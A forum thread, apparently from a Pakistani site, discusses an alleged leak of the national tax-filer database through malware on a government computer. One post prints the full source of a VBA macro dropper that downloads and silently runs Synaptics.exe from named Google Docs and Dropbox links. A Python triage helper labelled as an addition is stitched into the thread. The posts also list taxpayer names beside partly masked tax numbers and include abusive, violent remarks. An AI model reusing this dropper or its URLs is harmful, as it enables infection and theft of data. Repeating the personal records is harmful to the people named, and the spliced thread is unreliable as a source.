NTN Database hacked due to some nitwit moron trying PUBG Hacks on official work computers!

Jack Squire

MPA (400+ posts)
Salam Everyone!

Today I am beyond disappointed in the IT infrastructure of Pakistan - be it the govt websites or the supreme court website -- firstly, they all appear to be designed in the 90s OR perhaps they hired some dumbass kid to design and do all the graphics - just look at them, stretched pics, no sense of functionality and design flow!! But I am not here to rant about the idiots who unfortunately get hired due to their chacha mama into our bureaucracy-- No,

I am extremely disappointed since as a tax filer my personal tax info has been HACKED due to some moronic idiot(s) who decided to download a game's (PUBG) hacks onto his work computer that has sensitive information!!! WHO DOES THAT!!!??? And let's assume that they were an idiot and thus they did, why did the IT Policies in place at this govt facility not prevent this leak? Why did their security software not prompt that this hack that was downloaded is maliciously trying to send info out (to its creator) without any proper permissions?!!

I am not sure whether this is the complete list of tax filers of Pakistan, however the last entry is on line 1999361* -- this leak is from Jun 16-2019 -- after doing some reverse engineering I was able to crack the hacker's password - it seems to be communicating to 2 dropbox and 1 google docs accounts which although appear to be not active are indeed still up since every time I run the infected file this NTN excel sheet gets downloaded automatically ... implying this virus is still replicating and growing exponentially carrying along with it all of Pakistan's Tax Filers Info.... I was thinking of reporting it to the cybercrime center but clearly they are equally as incompetent since they still have not migrated to https.... and their website looks equally sketchy... I can provide the related docs to someone in authority who is willing to investigate this leak and fire the moron who decided to download illegal hacks on their work computer!
 

Jack Squire

MPA (400+ posts)
Oh and just as proof so y'all don't think I am trolling, here are the last few entries from the spreadsheet... obviously I changed their NTNs for anonymity...
1999354  822033xxxxxx  Syed Shafique Ul Hassan Gillani
1999355  822031xxxxxx  ABID HUSSAIN QURESHI
1999356  135030xxxxxx  Sakhi Sultan
1999357  822033xxxxxx  Jawad Latif
1999358  822035xxxxxx  Naveed Ahmed Khan
1999359  822032xxxxxx  Sajjad Ahmed lone
1999360  822039xxxxxx  Safeer Ahmed
1999361  374054xxxxxx  Raja Adeel Ishfaq
 

Billo Rani

Senator (1k+ posts)
You should report it so further/new entries are at least not uploaded. No guarantee any action will be taken due to the incompetence of Pakistani govt employees. That's almost 20 million entries so most likely everyone who is a filer. If you have the passwords to the dropbox and google drive accounts, can you change them?
 

Jack Squire

MPA (400+ posts)
oops!
that is crap really by govt institution.
Not soo much of crap by Govt, but by the people who get employed there -- and we all know how that goes, it's not based on merit (well maybe 30% is merit based, 70% is sifarish based), and that is where the problem lies! SOOOOO ANGRY!! I wish IK would do what China did, shoot the 500 most corrupt people in the country and watch how everyone falls in line!
 

Jack Squire

MPA (400+ posts)
Can't access the accounts..... shows page not found... I believe the links therein are only to download the malicious files that then take over the local infected machine and start to mine data and send info back to the attacker - here are the links --

URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"


This is the malicious code that does whatever it does (not really an expert at analyzing viruses - so if anyone wants to take a stab at it, please go ahead) -- it's in Visual Basic - was embedded in a password-protected Excel macro...
<BEGIN MALICIOUS CODE>
Sub MPS()
    Dim FSO As Object
    Dim FP(1 To 3), TMP, URL(1 To 3) As String

    Set FSO = CreateObject("scripting.filesystemobject")
    ' Copies of the payload the macro first looks for next to the infected workbook
    FP(1) = ActiveWorkbook.Path & "\~$cache1"
    FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"

    ' Fallback download locations, tried in order (URL(3) is a duplicate of URL(2))
    URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
    URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
    URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
    ' Staging path: whatever the source, the payload is run from %TEMP%\~$cache1.exe
    TMP = Environ("Temp") & "\~$cache1.exe"

    If FSO.FileExists(FP(1)) Then
        ' Copy the local payload into %TEMP% and launch it with a hidden window
        If Not FSO.FileExists(TMP) Then
            FileCopy FP(1), TMP
        End If
        Shell TMP, vbHide
    ElseIf FSO.FileExists(FP(2)) Then
        If Not FSO.FileExists(TMP) Then
            FileCopy FP(2), TMP
        End If
        Shell TMP, vbHide
    Else
        ' Previously installed copies; these two paths are the on-disk indicators to hunt for
        If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
            Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
        ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
            Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
        ElseIf Not FSO.FileExists(TMP) Then
            ' Nothing on disk: download from the first URL that answers, then run it
            If FDW((URL(1)), (TMP)) Then
            ElseIf FDW((URL(2)), (TMP)) Then
            ElseIf FDW((URL(3)), (TMP)) Then
            End If
            If FSO.FileExists(TMP) Then
                Shell TMP, vbHide
            End If
        Else
            Shell TMP, vbHide
        End If
    End If

End Sub

' Fetches MYU over WinHTTP and writes the body to NMA; True only when the reply is not an error page
Function FDW(MYU, NMA As String) As Boolean
    Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
    If WinHttpReq Is Nothing Then
        Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
    End If

    ' Option(0) = User-Agent string (spoofs an old IE); Option(6) = EnableRedirects
    ' (AllowRedirects is never declared in this macro, so it evaluates to Empty here)
    WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
    WinHttpReq.Option(6) = AllowRedirects
    WinHttpReq.Open "GET", MYU, False
    WinHttpReq.Send

    If (WinHttpReq.Status = 200) Then
        ' Treat Google/Dropbox "not found" pages as failure even though they return 200
        If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then
            FDW = True
            ' Binary-mode ADODB.Stream is how the downloaded bytes reach disk
            Set oStream = CreateObject("ADODB.Stream")
            oStream.Open
            oStream.Type = 1
            oStream.Write WinHttpReq.ResponseBody
            oStream.SaveToFile (NMA)
            oStream.Close
        Else
            FDW = False
        End If
    Else
        FDW = False
    End If
End Function
<> END MALICIOUS CODE <>
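A small triage helper for macros like the one above, added here as an example and not part of the original post or of the malware: it reads VBA source text and flags the download-and-execute chain this dropper uses (a WinHTTP client, an ADODB.Stream write to disk, and a hidden Shell launch), and lists the URLs and Environ-based drop paths a responder would hunt for. The embedded sample is a constructed, condensed copy of the macro with placeholder URLs; the regexes only cover the primitives seen in this thread.

```python
import re

# Constructed sample: a condensed copy of the thread's dropper macro with placeholder URLs.
SAMPLE_VBA = r'''
Sub MPS()
FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"
URL(1) = "https://docs.google.com/uc?id=PLACEHOLDER&export=download"
URL(2) = "https://www.dropbox.com/s/PLACEHOLDER/Synaptics.rar?dl=1"
TMP = Environ("Temp") & "\~$cache1.exe"
If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
End If
Shell TMP, vbHide
End Sub
Function FDW(MYU, NMA As String) As Boolean
Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
WinHttpReq.Open "GET", MYU, False
Set oStream = CreateObject("ADODB.Stream")
oStream.SaveToFile (NMA)
End Function
'''

# The three primitives that together form a download-and-execute chain in VBA.
STAGES = {
    "http_client": re.compile(r'CreateObject\("(WinHttp\.WinHttpRequest[^"]*|MSXML2\.XMLHTTP[^"]*)"\)', re.I),
    "write_to_disk": re.compile(r"ADODB\.Stream|SaveToFile", re.I),
    "execute_hidden": re.compile(r"\bShell\b[^\n]*\bvbHide\b", re.I),
}
URL_RE = re.compile(r'"(https?://[^"]+)"')
# Environ("VAR") & "\sub\path" or ActiveWorkbook.Path & "\file" -> a drop location
DROP_RE = re.compile(r'(Environ\("(\w+)"\)|ActiveWorkbook\.Path)\s*&\s*"(\\[^"]+)"', re.I)


def triage_vba(src: str) -> dict:
    """Return which stages are present, the URLs, the drop paths and a verdict."""
    stages = {name: bool(rx.search(src)) for name, rx in STAGES.items()}
    urls = sorted(set(URL_RE.findall(src)))
    # Render drop paths in the %VAR%\path form used in hunt queries; workbook-relative
    # paths get a labelled pseudo-variable since they depend on where the file was opened.
    drops = sorted({f"%{m.group(2) or 'WORKBOOKDIR'}%{m.group(3)}" for m in DROP_RE.finditer(src)})
    dropper = all(stages.values()) and bool(urls)
    return {"stages": stages, "urls": urls, "drop_paths": drops, "dropper": dropper}


if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Extract the macro source with a tool such as olevba from oletools before feeding it in; the helper works on text, not on the workbook itself.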
 

Billo Rani

Senator (1k+ posts)
Damn bro any recently up-to-date virus protection program would have prevented this. Advisory on synaptics.exe was issued in May 2019 or possibly even earlier. Also WTF they should be disabling running of macros at the domain level.
 

Jack Squire

MPA (400+ posts)
True, and not just disabling macros, heck implementing IT policies (like firewalls) that only allow certain pre-approved traffic through and prevent any unauthorized communication over the local network --- heck I've worked on very sensitive info here in the West and we had a totally different network for development altogether -- one that had no PHYSICAL access to the internet of the world, and the only way we could access it was to be physically present in that room, which logged everyone entering and leaving.....
Besides, employees should have the common sense NOT to download illegal hacks on work machines, and if someone does - well, first its propagation should be stopped, second - that person should be fired!
 

1234567

Minister (2k+ posts)
Salam Everyone!
First things first, which unit downloaded it? Grab that guy and make him/her pay all the expenses, then put him/her in jail under cyber security laws. Brothel's offspring. Secondly, who the fuck is security in charge, how come that stupid person was able to access and download such a thing, why didn't they put filters there, why didn't they block the port numbers for that game? Hang the network security engineer.
 

Notpersonal

Minister (2k+ posts)
I work as a network security engineer for a top Scandinavian cyber security company; the company uses the Cylance AI threat management solution and it's the best endpoint protection solution I have seen in my entire career.
 

Jack Squire

MPA (400+ posts)

To me equally important is having employees that are hired on merit - cuz clearly only sifarishi morons and patwaris are capable of such ignorant acts....
 

Xiggs

Chief Minister (5k+ posts)
NADRA's state-of-the-art X386 computers got hacked? How long must it have taken for the data to upload to the hacker over a 14.4 kbps dial-up modem?

Whoever has played PUBG, the FIA should turn his G into a PUB.
 

Notpersonal

Minister (2k+ posts)
It's not only employees, but also their managers or whatever level is above them. There must be internal security policies enforced on everyone, or maybe there is no culture of that there?
 

Jack Squire

MPA (400+ posts)
What concerns me the most is the fact that even Windows Defender would have been able to catch this (did for me) -- and the fact that the NTN database (contained in an Excel spreadsheet) got leaked sooo easily is just beyond what I can comprehend.... and yes when I say meritocracy - I mean even managers, directors and the like --- heck I was just browsing SUPARCO's Wikipedia page and came across an interesting fact -- 4 out of the 11 listed admins are only BS grads, heck even I feel like I am more qualified than these morons who've done nothing since inception.... whereas ISRO (Indian space agency) regularly launches satellites for other Asian/African nations while earning revenue on the one hand to sending space probes to Mars at a fraction of the cost!!
 

Notpersonal

Minister (2k+ posts)
Windows Defender does not catch zero days or more sophisticated scripts, but I understand your point. When you store public data then you have great responsibilities, and strict laws must be established and enforced just like GDPR for Europe. The security mechanisms adopted by companies storing public data use top-notch technologies; it is much more complex in detail to mention here, but using DLP modules together with proxies and a good endpoint security management solution should do the job. But definitely the people using these systems must have security awareness and qualifications or experience, and security policies must be enforced; there is much more to it.
As you also said, one weakest link, a "sifarishi" or incompetent head having the responsibilities, is sufficient to derail everything. I don't see it happening in the next 100 years because it's about culture.